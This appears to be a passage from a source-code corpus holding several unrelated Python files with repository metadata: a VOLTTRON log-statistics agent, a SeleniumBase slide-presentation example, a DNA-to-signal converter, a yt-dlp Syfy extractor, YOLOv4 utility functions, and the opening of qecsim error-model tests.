:type config_path: str :returns: LogStatisticsAgent agent instance :rtype: LogStatisticsAgent agent """ config = utils.load_config(config_path) return LogStatisticsAgent(config, **kwargs) class LogStatisticsAgent(Agent): """ LogStatisticsAgent reads volttron.log file size every hour, compute the size delta from previous hour and publish the difference with timestamp. It also publishes standard deviation every 24 hours. :param config: Configuration dict :type config: dict Example configuration: .. code-block:: python { "file_path" : "/home/volttron/volttron.log", "analysis_interval_sec" : 60, "publish_topic" : "platform/log_statistics", "historian_topic" : "analysis/log_statistics" } """ def __init__(self, config, **kwargs): super(LogStatisticsAgent, self).__init__(**kwargs) self.analysis_interval_sec = config["analysis_interval_sec"] self.file_path = config["file_path"] self.publish_topic = config["publish_topic"] self.historian_topic = config["historian_topic"] self.size_delta_list = [] self.file_start_size = None self.prev_file_size = None self._scheduled_event = None @Core.receiver('onstart') def starting(self, sender, **kwargs): _log.info("Starting " + self.__class__.__name__ + " agent") self.publish_analysis() def publish_analysis(self): """ Publishes file's size increment in previous time interval (60 minutes) with timestamp. Also publishes standard deviation of file's hourly size differences every 24 hour. """ if self._scheduled_event is not None: self._scheduled_event.cancel() if self.prev_file_size is None: self.prev_file_size = self.get_file_size() _log.debug("init_file_size = {}".format(self.prev_file_size)) else: # read file size curr_file_size = self.get_file_size() # calculate size delta size_delta = curr_file_size - self.prev_file_size self.prev_file_size = curr_file_size self.size_delta_list.append(size_delta) headers = {'Date': datetime.datetime.utcnow().isoformat() + 'Z'} publish_message = {'timestamp': datetime.datetime.utcnow().isoformat() + 'Z', 'log_size_delta': size_delta} historian_message = [{"log_size_delta ": size_delta}, {"log_size_delta ": {'units': 'bytes', 'tz': 'UTC', 'type': 'float'}}] if len(self.size_delta_list) == 24: standard_deviation = statistics.stdev(self.size_delta_list) publish_message['log_std_dev'] = standard_deviation historian_message[0]['log_std_dev'] = standard_deviation historian_message[1]['log_std_dev'] = {'units': 'bytes', 'tz': 'UTC', 'type': 'float'} _log.debug('publishing message {} with header {} on historian topic {}' .format(historian_message, headers, self.historian_topic)) self.vip.pubsub.publish(peer="pubsub", topic=self.historian_topic, headers=headers, message=historian_message) self.size_delta_list = [] _log.debug('publishing message {} on topic {}'.format(publish_message, self.publish_topic)) self.vip.pubsub.publish(peer="pubsub", topic=self.publish_topic, message=publish_message) _log.debug('Scheduling next periodic call') now = get_aware_utc_now() next_update_time = now + datetime.timedelta(seconds=self.analysis_interval_sec) self._scheduled_event = self.core.schedule(next_update_time, self.publish_analysis) def get_file_size(self): try: return os.path.getsize(self.file_path) except OSError as e: _log.error(e) def main(argv=sys.argv): """ Main method called by the platform. """ utils.vip_main(log_statistics, identity='platform.logstatisticsagent') if __name__ == '__main__': # Entry point for script try: sys.exit(main()) except KeyboardInterrupt: pass
39.95858
117
0.685473
ceacce6a356457dd0ca92b5e60fabae47f015271
6,318
py
Python
examples/presenter/my_presentation.py
mdmintz/seleniumspot
f5c225aa4fcd0b4124fc990e3892c36736290ce8
[ "MIT" ]
2,745
2016-07-20T09:13:15.000Z
2022-03-29T15:07:31.000Z
examples/presenter/my_presentation.py
mdmintz/seleniumspot
f5c225aa4fcd0b4124fc990e3892c36736290ce8
[ "MIT" ]
384
2016-07-17T20:45:26.000Z
2022-03-31T22:35:35.000Z
examples/presenter/my_presentation.py
mdmintz/seleniumspot
f5c225aa4fcd0b4124fc990e3892c36736290ce8
[ "MIT" ]
704
2016-07-17T20:47:04.000Z
2022-03-31T04:32:35.000Z
from seleniumbase import BaseCase class MyPresenterClass(BaseCase): def test_presenter(self): self.create_presentation(theme="serif", transition="none") self.add_slide( "<h1>Welcome</h1><br />\n" "<h3>Press the <b>Right Arrow</b></h3>" ) self.add_slide( "<h3>SeleniumBase Presenter</h3><br />\n" '<img width="240" src="https://seleniumbase.io/img/logo3a.png" />' '<span style="margin:144px;" />' '<img src="https://seleniumbase.io/other/python_3d_logo.png" />' "<br /><br />\n<h4>Create presentations with <b>Python</b></h4>" ) self.add_slide( "<h3>Make slides using <b>HTML</b>:</h3><br />\n" '<table style="padding:10px;border:4px solid black;font-size:50;">' '\n<tr style="background-color:CDFFFF;">\n' "<th>Row ABC</th><th>Row XYZ</th></tr>\n" '<tr style="background-color:DCFDDC;">' "<td>Value ONE</td><td>Value TWO</td></tr>\n" '<tr style="background-color:DFDFFB;">\n' "<td>Value THREE</td><td>Value FOUR</td></tr>\n" "</table><br />\n<h4>(HTML <b>table</b> example)</h4>" ) self.add_slide( "<h3>Keyboard Shortcuts:</h3>\n" '<table style="padding:10px;border:4px solid black;font-size:30;' 'background-color:FFFFDD;">\n' "<tr><th>Key</th><th>Action</th></tr>\n" "<tr><td><b>=></b></td><td>Next Slide (N also works)</td></tr>\n" "<tr><td><b><=</b></td><td>Previous Slide (P also works)</td></tr>" "\n<tr><td>F</td><td>Full Screen Mode</td></tr>\n" "<tr><td>O</td><td>Overview Mode Toggle</td></tr>\n" "<tr><td>esc</td><td>Exit Full Screen / Overview Mode</td></tr>\n" "<tr><td><b>.</b></td><td>Pause/Resume Toggle</td></tr>\n" "<tr><td>space</td><td>Next Slide (alternative)</td></tr></table>" ) self.add_slide( "<h3>Add <b>images</b> to slides:</h3>", image="https://seleniumbase.io/other/seagulls.jpg", ) self.add_slide( "<h3>Add <b>code</b> to slides:</h3>", code=( "from seleniumbase import BaseCase\n\n" "class MyTestClass(BaseCase):\n\n" " def test_basics(self):\n" ' self.open("https://store.xkcd.com/search")\n' ' self.type(\'input[name="q"]\', "xkcd book\\n")\n' ' self.assert_text("xkcd: volume 0", "h3")\n' ' self.open("https://xkcd.com/353/")\n' ' self.assert_title("xkcd: Python")\n' " self.assert_element('img[alt=\"Python\"]')\n" " self.click('a[rel=\"license\"]')\n" ' self.assert_text("free to copy and reuse")\n' " self.go_back()\n" ' self.click_link("About")\n' ' self.assert_exact_text("xkcd.com", "h2")' ), ) self.add_slide( "<h3>Highlight <b>code</b> in slides:</h3>", code=( "from seleniumbase import BaseCase\n\n" "<mark>class MyTestClass(BaseCase):</mark>\n\n" " def test_basics(self):\n" ' self.open("https://store.xkcd.com/search")\n' ' self.type(\'input[name="q"]\', "xkcd book\\n")\n' ' self.assert_text("xkcd: volume 0", "h3")' ), ) self.add_slide( "<h3>Add <b>iFrames</b> to slides:</h3>", iframe="https://seleniumbase.io/demo_page", ) self.add_slide( "<h3>Getting started is <b>easy</b>:</h3>", code=( "from seleniumbase import BaseCase\n\n" "class MyPresenterClass(BaseCase):\n\n" " def test_presenter(self):\n" ' self.create_presentation(theme="serif")\n' ' self.add_slide("Welcome to Presenter!")\n' " self.add_slide(\n" ' "Add code to slides:",\n' " code=(\n" ' "from seleniumbase import BaseCase\\n\\n"\n' ' "class MyPresenterClass(BaseCase):\\n\\n"\n' ' " def test_presenter(self):\\n"\n' ' " self.create_presentation()\\n"))\n' " self.begin_presentation(\n" ' filename="demo.html", show_notes=True)' ), ) self.add_slide( "<h3>Include <b>notes</b> with slides:</h3><br />", code=( 'self.add_slide("[Your HTML goes here]",\n' ' code="[Your software code goes here]",\n' ' content2="[Additional HTML goes here]",\n' ' notes="[Attached speaker notes go here]"\n' ' "[Note A! -- Note B! -- Note C! ]")' ), notes="<h2><ul><li>Note A!<li>Note B!<li>Note C!<li>Note D!</h2>", content2="<h4>(Notes can include HTML tags)</h4>", ) self.add_slide( "<h3>Multiple <b>themes</b> available:</h3>", code=( 'self.create_presentation(theme="serif")\n\n' 'self.create_presentation(theme="sky")\n\n' 'self.create_presentation(theme="simple")\n\n' 'self.create_presentation(theme="white")\n\n' 'self.create_presentation(theme="moon")\n\n' 'self.create_presentation(theme="black")\n\n' 'self.create_presentation(theme="night")\n\n' 'self.create_presentation(theme="beige")\n\n' 'self.create_presentation(theme="league")' ), ) self.add_slide( "<h2><b>The End</b></h2>", image="https://seleniumbase.io/img/sb_logo_10.png", ) self.begin_presentation( filename="presenter.html", show_notes=True, interval=0 )
48.229008
79
0.466129
35dd40fc28ff605b93136a6aa4fd8514d5d8f5a1
9,738
py
Python
src/utils/gene_to_signal.py
ithihasmadala/gene-to-signal
96efc1253604c0b5b46a0643e10bd1f0c9a7801c
[ "MIT" ]
null
null
null
src/utils/gene_to_signal.py
ithihasmadala/gene-to-signal
96efc1253604c0b5b46a0643e10bd1f0c9a7801c
[ "MIT" ]
null
null
null
src/utils/gene_to_signal.py
ithihasmadala/gene-to-signal
96efc1253604c0b5b46a0643e10bd1f0c9a7801c
[ "MIT" ]
null
null
null
# *Import packages from os import error import math import csv import sys # !Specify the type of representation you want the DNA sequence to be converted into. Choose from: ['Voss', 'Tetrahedron', 'Integer', 'Real', 'Complex']. Default = 'Voss' # *This is the only variable that needs to be set in this script. metric = 'Voss' # !Functions # *Function to make a list out of the gene sequence. Outputs a list from a string input. def split(gene): return [base for base in gene] # *Function to flatten nested lists into list. Outputs a linear list from a nested list input. def merge(nuclist): lis = [] for el in sum(nuclist, []): lis.append(el) return lis # *Funtion to change sequences to signals. Inputs a seq (string) and type(string) of representation and outputs a list of DNA signal. def DNAtoSignal(seq, type): # *Splitting the seq string into a seq list." baselist = split(seq) # *Voss Representation. (signal[0], signal[1], signal[2], signal[3]) ~ (A, G, T, C) respectively. if (type == "Voss"): # *Output list called signal. signal = [[],[],[],[]] for base in baselist: if base == 'C' or base == 'c': signal[3].append(1) signal[1].append(0) signal[0].append(0) signal[2].append(0) elif base == 'G' or base == 'g': signal[3].append(0) signal[1].append(1) signal[0].append(0) signal[2].append(0) elif base == 'A' or base == 'a': signal[3].append(0) signal[1].append(0) signal[0].append(1) signal[2].append(0) elif base == 'T' or base == 't': signal[3].append(0) signal[1].append(0) signal[0].append(0) signal[2].append(1) elif base == 'U' or base == 'u': signal[3].append(0) signal[1].append(0) signal[0].append(0) signal[2].append(1) elif base == 'R' or base == 'r': signal[3].append(0) signal[1].append(1) signal[0].append(1) signal[2].append(0) elif base == 'Y' or base == 'y': signal[3].append(1) signal[1].append(0) signal[0].append(0) signal[2].append(1) elif base == 'K' or base == 'k': signal[3].append(0) signal[1].append(1) signal[0].append(0) signal[2].append(1) elif base == 'M' or base == 'm': signal[3].append(1) signal[1].append(0) signal[0].append(1) signal[2].append(0) elif base == 'S' or base == 's': signal[3].append(1) signal[1].append(1) signal[0].append(0) signal[2].append(0) elif base == 'W' or base == 'w': signal[3].append(0) signal[1].append(0) signal[0].append(1) signal[2].append(1) elif base == 'B' or base == 'b': signal[3].append(1) signal[1].append(1) signal[0].append(0) signal[2].append(1) elif base == 'D' or base == 'd': signal[3].append(0) signal[1].append(1) signal[0].append(1) signal[2].append(1) elif base == 'H' or base == 'h': signal[3].append(1) signal[1].append(0) signal[0].append(1) signal[2].append(1) elif base == 'V' or base == 'v': signal[3].append(1) signal[1].append(1) signal[0].append(1) signal[2].append(0) elif base == 'N' or base == 'n': signal[3].append(1) signal[1].append(1) signal[0].append(1) signal[2].append(1) elif base == 'X' or base == 'x': signal[3].append(1) signal[1].append(1) signal[0].append(1) signal[2].append(1) # *Returning a flattened list. return merge(signal) # *Tetrahedron Representation. The formula is taken from the paper <https://dx.doi.org/10.7717%2Fpeerj.4264> elif type == 'Tetrahedron': signal = [[],[],[]] for base in baselist: if base == 'A' or base == 'a': signal[0].append(0*math.sqrt(2)/3) signal[1].append(0*math.sqrt(6)/3) signal[2].append(3/3) if base == 'G' or base == 'g': signal[0].append(-1*math.sqrt(2)/3) signal[1].append(-1*math.sqrt(6)/3) signal[2].append(-1/3) if base == 'T' or base == 't': signal[0].append(2*math.sqrt(2)/3) signal[1].append(0*math.sqrt(6)/3) signal[2].append(-1/3) if base == 'C' or base == 'c': signal[0].append(-1*math.sqrt(2)/3) signal[1].append(1*math.sqrt(6)/3) signal[2].append(-1/3) if base == 'U' or base == 'u': signal[0].append(2*math.sqrt(2)/3) signal[1].append(0*math.sqrt(6)/3) signal[2].append(-1/3) return merge(signal) # *Integer Representation. (0,1,2,3) ~ (A, T, G, C) respectively. elif type == 'Integer': signal = [] for base in baselist: if base == 'C' or base == 'c': signal.append(3) if base == 'G' or base == 'g': signal.append(2) if base == 'A' or base == 'a': signal.append(0) if base == 'T' or base == 't': signal.append(1) if base == 'U' or base == 'u': signal.append(1) return signal # *Real Representation. (-1.5, -0.5, 0.5, 1.5) ~ (A, T, G, C) respectively. elif type == 'Real': signal = [] for base in baselist: if base == 'C' or base == 'c': signal.append(1.5) if base == 'G' or base == 'g': signal.append(0.5) if base == 'A' or base == 'a': signal.append(-1.5) if base == 'T' or base == 't': signal.append(-0.5) if base == 'U' or base == 'u': signal.append(-0.5) return signal # *Complex Representation. ((1,1), (1,-1), (-1,1), (-1,-1)) ~ (A, T, G, C) respectively. elif type == 'Complex': signal = [[],[]] for base in baselist: if base == 'C' or base == 'c': signal[0].append(-1) signal[1].append(-1) if base == 'G' or base == 'g': signal[0].append(-1) signal[1].append(1) if base == 'A' or base == 'a': signal[0].append(1) signal[1].append(1) if base == 'T' or base == 't': signal[0].append(1) signal[1].append(-1) if base == 'U' or base == 'u': signal[0].append(1) signal[1].append(-1) return merge(signal) # *List to make DNASignal.csv DNASignal = [] # *Check to see error in choosing representation. if metric in ['Voss', 'Tetrahedron', 'Integer', 'Real', 'Complex']: # *Opening dataset.csv with gene sequences. with open('../../data/interim/dataset.csv', mode='r') as csv_file: rows = csv.DictReader(csv_file) # *To check if running properly. current_class = 'Birds' print("\nConverting DNA sequences to "+metric+" representation.") print("---------------------------------------------------------------------------------------------------------------") print("Converting class of "+current_class+".") # *Looping through the various gene sequences in dataset.csv. for row in rows: if current_class != row['Class']: current_class = row['Class'] print("Converting class of "+current_class+".") # *Calling the DNAtoSignal function to generate DNA signal. signal = DNAtoSignal(row['Gene Sequence'], metric) # *Making new csv row with 'Signal' key. data_row = {'Class': row['Class'], 'ID': row['ID'], 'Gene Sequence': row['Gene Sequence'], 'Signal': signal} DNASignal.append(data_row) # *Creating the csv at ../../data/processed/DNASignal.csv. with open('../../data/processed/DNASignal.csv', 'w') as csvfile: writer = csv.DictWriter(csvfile, fieldnames=DNASignal[0].keys()) writer.writeheader() writer.writerows(DNASignal) # *Statement signfying end of script. print("---------------------------------------------------------------------------------------------------------------") print("Sequences converted and stored at gene-to-signal/data/processed/DNASignal.csv.\n") # *In case of wrong representation variable. else: print("\n---------------------------------------------------------------------------------------------------------------") print("\nError: Type of representation is not supported. Please check the variable 'metric'.\n") print("---------------------------------------------------------------------------------------------------------------") sys.exit()
39.425101
170
0.454919
4362266424de6b76013b18124be2bcc5cd063452
76
py
Python
engine/model/__init__.py
rahulmadanraju/Semantic-Search-Engine
b0be4b9cdee2362be6c7ac97865c2588a7acdc15
[ "MIT" ]
2
2020-06-03T11:26:56.000Z
2020-07-23T11:23:32.000Z
engine/model/__init__.py
rahulmadanraju/Semantic-Search-Engine
b0be4b9cdee2362be6c7ac97865c2588a7acdc15
[ "MIT" ]
null
null
null
engine/model/__init__.py
rahulmadanraju/Semantic-Search-Engine
b0be4b9cdee2362be6c7ac97865c2588a7acdc15
[ "MIT" ]
null
null
null
from engine.model.transformers import sentence_embeddings, predict_results
25.333333
74
0.881579
64ee140fd3a5dfa235fd7544d5ea51dcf2badd45
7,881
py
Python
tool/utils.py
kndt84/pytorch-YOLOv4
dfaada3517c5e3bea07f96e0e1e62a003271fa24
[ "Apache-2.0" ]
null
null
null
tool/utils.py
kndt84/pytorch-YOLOv4
dfaada3517c5e3bea07f96e0e1e62a003271fa24
[ "Apache-2.0" ]
null
null
null
tool/utils.py
kndt84/pytorch-YOLOv4
dfaada3517c5e3bea07f96e0e1e62a003271fa24
[ "Apache-2.0" ]
null
null
null
import sys import os import time import math import numpy as np import cv2 import itertools import struct # get_image_size import imghdr # get_image_size from torch import nn from torchvision import datasets, models, transforms from torch.autograd import Variable from PIL import Image def extract_feature(img): model = models.googlenet(pretrained=True) layers = list(model.children())[:-2] model = nn.Sequential(*layers, nn.Flatten()) normalize = transforms.Normalize( mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]) preprocess = transforms.Compose([ transforms.Resize(256), transforms.CenterCrop(224), transforms.ToTensor(), normalize ]) new_img = np.copy(img) new_img = cv2.cvtColor(new_img, cv2.COLOR_BGR2RGB) new_img = Image.fromarray(new_img) img_tensor = preprocess(new_img) img_tensor.unsqueeze_(0) out = model(Variable(img_tensor)) return out.to('cpu').detach().numpy().ravel() def crop_box(img, box): img = np.copy(img) width = img.shape[1] height = img.shape[0] x0 = int(box[0] * width) y0 = int(box[1] * height) x1 = int(box[2] * width) y1 = int(box[3] * height) return img[y0:y1, x0:x1] def get_bbox_coordinates(img, box): img = np.copy(img) width = img.shape[1] height = img.shape[0] x0 = int(box[0] * width) y0 = int(box[1] * height) x1 = int(box[2] * width) y1 = int(box[3] * height) return {'x0':x0, 'y0': y0, 'x1': x1, 'y1': y1} def sigmoid(x): return 1.0 / (np.exp(-x) + 1.) def softmax(x): x = np.exp(x - np.expand_dims(np.max(x, axis=1), axis=1)) x = x / np.expand_dims(x.sum(axis=1), axis=1) return x def bbox_iou(box1, box2, x1y1x2y2=True): # print('iou box1:', box1) # print('iou box2:', box2) if x1y1x2y2: mx = min(box1[0], box2[0]) Mx = max(box1[2], box2[2]) my = min(box1[1], box2[1]) My = max(box1[3], box2[3]) w1 = box1[2] - box1[0] h1 = box1[3] - box1[1] w2 = box2[2] - box2[0] h2 = box2[3] - box2[1] else: w1 = box1[2] h1 = box1[3] w2 = box2[2] h2 = box2[3] mx = min(box1[0], box2[0]) Mx = max(box1[0] + w1, box2[0] + w2) my = min(box1[1], box2[1]) My = max(box1[1] + h1, box2[1] + h2) uw = Mx - mx uh = My - my cw = w1 + w2 - uw ch = h1 + h2 - uh carea = 0 if cw <= 0 or ch <= 0: return 0.0 area1 = w1 * h1 area2 = w2 * h2 carea = cw * ch uarea = area1 + area2 - carea return carea / uarea def nms_cpu(boxes, confs, nms_thresh=0.5, min_mode=False): # print(boxes.shape) x1 = boxes[:, 0] y1 = boxes[:, 1] x2 = boxes[:, 2] y2 = boxes[:, 3] areas = (x2 - x1) * (y2 - y1) order = confs.argsort()[::-1] keep = [] while order.size > 0: idx_self = order[0] idx_other = order[1:] keep.append(idx_self) xx1 = np.maximum(x1[idx_self], x1[idx_other]) yy1 = np.maximum(y1[idx_self], y1[idx_other]) xx2 = np.minimum(x2[idx_self], x2[idx_other]) yy2 = np.minimum(y2[idx_self], y2[idx_other]) w = np.maximum(0.0, xx2 - xx1) h = np.maximum(0.0, yy2 - yy1) inter = w * h if min_mode: over = inter / np.minimum(areas[order[0]], areas[order[1:]]) else: over = inter / (areas[order[0]] + areas[order[1:]] - inter) inds = np.where(over <= nms_thresh)[0] order = order[inds + 1] return np.array(keep) def plot_boxes_cv2(img, boxes, savename=None, class_names=None, color=None): img = np.copy(img) colors = np.array([[1, 0, 1], [0, 0, 1], [0, 1, 1], [0, 1, 0], [1, 1, 0], [1, 0, 0]], dtype=np.float32) def get_color(c, x, max_val): ratio = float(x) / max_val * 5 i = int(math.floor(ratio)) j = int(math.ceil(ratio)) ratio = ratio - i r = (1 - ratio) * colors[i][c] + ratio * colors[j][c] return int(r * 255) width = img.shape[1] height = img.shape[0] for i in range(len(boxes)): box = boxes[i] x1 = int(box[0] * width) y1 = int(box[1] * height) x2 = int(box[2] * width) y2 = int(box[3] * height) if color: rgb = color else: rgb = (255, 0, 0) if len(box) >= 7 and class_names: cls_conf = box[5] cls_id = box[6] print('%s: %f' % (class_names[cls_id], cls_conf)) classes = len(class_names) offset = cls_id * 123457 % classes red = get_color(2, offset, classes) green = get_color(1, offset, classes) blue = get_color(0, offset, classes) if color is None: rgb = (red, green, blue) img = cv2.putText(img, class_names[cls_id], (x1, y1), cv2.FONT_HERSHEY_SIMPLEX, 1.2, rgb, 1) img = cv2.rectangle(img, (x1, y1), (x2, y2), rgb, 1) if savename: print("save plot results to %s" % savename) cv2.imwrite(savename, img) return img def read_truths(lab_path): if not os.path.exists(lab_path): return np.array([]) if os.path.getsize(lab_path): truths = np.loadtxt(lab_path) truths = truths.reshape(truths.size / 5, 5) # to avoid single truth problem return truths else: return np.array([]) def load_class_names(namesfile): class_names = [] with open(namesfile, 'r') as fp: lines = fp.readlines() for line in lines: line = line.rstrip() class_names.append(line) return class_names def post_processing(img, conf_thresh, nms_thresh, output): # anchors = [12, 16, 19, 36, 40, 28, 36, 75, 76, 55, 72, 146, 142, 110, 192, 243, 459, 401] # num_anchors = 9 # anchor_masks = [[0, 1, 2], [3, 4, 5], [6, 7, 8]] # strides = [8, 16, 32] # anchor_step = len(anchors) // num_anchors # [batch, num, 1, 4] box_array = output[0] # [batch, num, num_classes] confs = output[1] t1 = time.time() if type(box_array).__name__ != 'ndarray': box_array = box_array.cpu().detach().numpy() confs = confs.cpu().detach().numpy() num_classes = confs.shape[2] # [batch, num, 4] box_array = box_array[:, :, 0] # [batch, num, num_classes] --> [batch, num] max_conf = np.max(confs, axis=2) max_id = np.argmax(confs, axis=2) t2 = time.time() bboxes_batch = [] for i in range(box_array.shape[0]): argwhere = max_conf[i] > conf_thresh l_box_array = box_array[i, argwhere, :] l_max_conf = max_conf[i, argwhere] l_max_id = max_id[i, argwhere] bboxes = [] # nms for each class for j in range(num_classes): cls_argwhere = l_max_id == j ll_box_array = l_box_array[cls_argwhere, :] ll_max_conf = l_max_conf[cls_argwhere] ll_max_id = l_max_id[cls_argwhere] keep = nms_cpu(ll_box_array, ll_max_conf, nms_thresh) if (keep.size > 0): ll_box_array = ll_box_array[keep, :] ll_max_conf = ll_max_conf[keep] ll_max_id = ll_max_id[keep] for k in range(ll_box_array.shape[0]): bboxes.append([ll_box_array[k, 0], ll_box_array[k, 1], ll_box_array[k, 2], ll_box_array[k, 3], ll_max_conf[k], ll_max_conf[k], ll_max_id[k]]) bboxes_batch.append(bboxes) t3 = time.time() print('-----------------------------------') print(' max and argmax : %f' % (t2 - t1)) print(' nms : %f' % (t3 - t2)) print('Post processing total : %f' % (t3 - t1)) print('-----------------------------------') return bboxes_batch
27.652632
161
0.541809
c79d27a0de5cac6efb738d035efb4090ca390091
2,005
py
Python
yt_dlp/extractor/syfy.py
olipfei/yt-dlp
7879e79d11a2e5855167820518df49caf623fe48
[ "Unlicense" ]
11
2022-01-06T22:09:50.000Z
2022-03-12T22:26:22.000Z
yt_dlp/extractor/syfy.py
olipfei/yt-dlp
7879e79d11a2e5855167820518df49caf623fe48
[ "Unlicense" ]
4
2022-02-25T08:20:18.000Z
2022-03-17T16:16:20.000Z
yt_dlp/extractor/syfy.py
olipfei/yt-dlp
7879e79d11a2e5855167820518df49caf623fe48
[ "Unlicense" ]
3
2022-02-19T08:59:13.000Z
2022-03-06T16:11:21.000Z
from .adobepass import AdobePassIE from ..utils import ( update_url_query, smuggle_url, ) class SyfyIE(AdobePassIE): _VALID_URL = r'https?://(?:www\.)?syfy\.com/(?:[^/]+/)?videos/(?P<id>[^/?#]+)' _TESTS = [{ 'url': 'http://www.syfy.com/theinternetruinedmylife/videos/the-internet-ruined-my-life-season-1-trailer', 'info_dict': { 'id': '2968097', 'ext': 'mp4', 'title': 'The Internet Ruined My Life: Season 1 Trailer', 'description': 'One tweet, one post, one click, can destroy everything.', 'uploader': 'NBCU-MPAT', 'upload_date': '20170113', 'timestamp': 1484345640, }, 'params': { # m3u8 download 'skip_download': True, }, 'add_ie': ['ThePlatform'], }] def _real_extract(self, url): display_id = self._match_id(url) webpage = self._download_webpage(url, display_id) syfy_mpx = list(self._parse_json(self._search_regex( r'jQuery\.extend\(Drupal\.settings\s*,\s*({.+?})\);', webpage, 'drupal settings'), display_id)['syfy']['syfy_mpx'].values())[0] video_id = syfy_mpx['mpxGUID'] title = syfy_mpx['episodeTitle'] query = { 'mbr': 'true', 'manifest': 'm3u', } if syfy_mpx.get('entitlement') == 'auth': resource = self._get_mvpd_resource( 'syfy', title, video_id, syfy_mpx.get('mpxRating', 'TV-14')) query['auth'] = self._extract_mvpd_auth( url, video_id, 'syfy', resource) return { '_type': 'url_transparent', 'ie_key': 'ThePlatform', 'url': smuggle_url(update_url_query( self._proto_relative_url(syfy_mpx['releaseURL']), query), {'force_smil_url': True}), 'title': title, 'id': video_id, 'display_id': display_id, }
35.175439
113
0.527681
d2733611e34b0b364c29ff473b041a44ce553f2b
26
py
Python
utils/all.py
QiangZiBro/compass
30c3d89a69e496185488dd5f596de517f59624fc
[ "Apache-2.0" ]
null
null
null
utils/all.py
QiangZiBro/compass
30c3d89a69e496185488dd5f596de517f59624fc
[ "Apache-2.0" ]
1
2021-09-23T06:59:23.000Z
2021-09-23T06:59:23.000Z
utils/all.py
QiangZiBro/compass
30c3d89a69e496185488dd5f596de517f59624fc
[ "Apache-2.0" ]
null
null
null
import open3d import torch
13
13
0.884615
7901f8712e7c9a9d62614608e1db94ba004f877a
3,488
py
Python
a2ml/api/auger/model.py
augerai/a2ml
9d9ce0ac1b51cc81f1cb5ae331c4523131bc6a86
[ "Apache-2.0" ]
30
2019-07-01T13:23:27.000Z
2022-03-16T21:19:33.000Z
a2ml/api/auger/model.py
augerai/a2ml
9d9ce0ac1b51cc81f1cb5ae331c4523131bc6a86
[ "Apache-2.0" ]
234
2019-07-04T13:56:15.000Z
2021-11-04T10:12:55.000Z
a2ml/api/auger/model.py
augerai/a2ml
9d9ce0ac1b51cc81f1cb5ae331c4523131bc6a86
[ "Apache-2.0" ]
13
2019-07-04T14:00:34.000Z
2020-07-13T11:18:44.000Z
from .impl.cloud.rest_api import RestApi from .impl.decorators import with_project from a2ml.api.utils.decorators import error_handler, authenticated from .impl.model import Model from .credentials import Credentials class AugerModel(object): def __init__(self, ctx): self.ctx = ctx self.credentials = Credentials(ctx).load() self.ctx.rest_api = RestApi( self.credentials.api_url, self.credentials.token) @error_handler @authenticated @with_project(autocreate=False) def deploy(self, project, model_id, locally, review, name, algorithm, score, data_path, metadata=None): model_id = Model(self.ctx, project).deploy(model_id, locally, review, name, algorithm, score, data_path, metadata) return {'model_id': model_id} @error_handler @authenticated #@with_project(autocreate=False) def predict(self, filename, model_id, threshold, locally, data, columns, predicted_at, output, no_features_in_result, score, score_true_data): if locally: self.deploy(model_id, locally, review=False, name=None, algorithm=None, score=None, data_path=None) predicted = Model(self.ctx, project=None).predict( filename, model_id, threshold, locally, data, columns, predicted_at, output, no_features_in_result, score, score_true_data) if filename: self.ctx.log('Predictions stored in %s' % predicted) if isinstance(predicted, dict) and 'predicted' in predicted: return predicted return {'predicted': predicted} @error_handler @authenticated @with_project(autocreate=False) def actuals(self, project, model_id, filename=None, data=None, columns=None, actuals_at=None, actual_date_column=None, locally=False): return Model(self.ctx, project).actuals(model_id, filename, data, columns, actuals_at, actual_date_column, locally) @error_handler @authenticated @with_project(autocreate=False) def delete_actuals(self, project, model_id, with_predictions=False, begin_date=None, end_date=None, locally=False): return Model(self.ctx, project).delete_actuals(model_id, with_predictions, begin_date, end_date, locally) @error_handler @authenticated @with_project(autocreate=False) def review_alert(self, project, model_id, parameters, name): return Model(self.ctx, project).review_alert(model_id, parameters, name) @error_handler @authenticated @with_project(autocreate=False) def build_review_data(self, project, model_id, locally, output): return Model(self.ctx, project).build_review_data(model_id, locally, output) @error_handler @authenticated @with_project(autocreate=False) def review(self, project, model_id): return Model(self.ctx, project).review(model_id) @error_handler @authenticated @with_project(autocreate=False) def undeploy(self, project, model_id, locally): Model(self.ctx, project).undeploy(model_id, locally) return {'model_id': model_id} @error_handler @authenticated #@with_project(autocreate=False) def get_info(self, model_id, locally): return Model(self.ctx, project=None).get_info(model_id, locally) @error_handler @authenticated #@with_project(autocreate=False) def update(self, model_id, metadata, locally): return Model(self.ctx, project=None).update(model_id, metadata, locally)
38.32967
138
0.711869
6852f14a0a4865116686058f45d93848e7050de2
7,481
py
Python
tests/models/test_generic_file_error_model.py
dua-arpit/qecsim
70ded606a653fd96d517e07fbba15d9b755df752
[ "BSD-3-Clause" ]
35
2021-02-08T08:32:54.000Z
2022-03-22T05:35:06.000Z
tests/models/test_generic_file_error_model.py
dua-arpit/qecsim
70ded606a653fd96d517e07fbba15d9b755df752
[ "BSD-3-Clause" ]
2
2021-08-05T06:10:35.000Z
2021-08-20T12:44:10.000Z
tests/models/test_generic_file_error_model.py
dua-arpit/qecsim
70ded606a653fd96d517e07fbba15d9b755df752
[ "BSD-3-Clause" ]
7
2021-02-11T17:32:47.000Z
2021-11-30T12:34:41.000Z
import math import os import numpy as np import pytest from click.testing import CliRunner # use for isolated_filesystem feature from qecsim import app from qecsim import paulitools as pt from qecsim.models.basic import FiveQubitCode from qecsim.models.generic import FileErrorModel from qecsim.models.rotatedplanar import RotatedPlanarCode, RotatedPlanarMPSDecoder FILES_DIR = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'test_generic_file_error_model_files') @pytest.mark.parametrize('filename, start', [ (os.path.join(FILES_DIR, 'fivequbitcode-errors-p0.4-bias10.jsonl'), 0), (os.path.join(FILES_DIR, 'fivequbitcode-errors-p0.4-bias10.jsonl'), 3), ]) def test_file_error_model_init(filename, start): FileErrorModel(filename, start) # no error raised @pytest.mark.parametrize('filename, start', [ (os.path.join(FILES_DIR, 'fivequbitcode-errors-p0.4-bias10.jsonl'), 'blah'), (os.path.join(FILES_DIR, 'fivequbitcode-errors-p0.4-bias10.jsonl'), -1), (os.path.join(FILES_DIR, 'fivequbitcode-errors-p0.4-bias10.jsonl'), 0.4), (None, 0), ]) def test_file_error_model_init_invalid_parameters(filename, start): with pytest.raises((ValueError, TypeError), match=r"^FileErrorModel") as exc_info: FileErrorModel(filename, start) # expected error raised print(exc_info) @pytest.mark.parametrize('filename', [ "this_file_does_not_exist.txt", "this_one_also.json", "and_this_one", ]) def test_file_error_model_file_not_found(filename): with pytest.raises(FileNotFoundError): 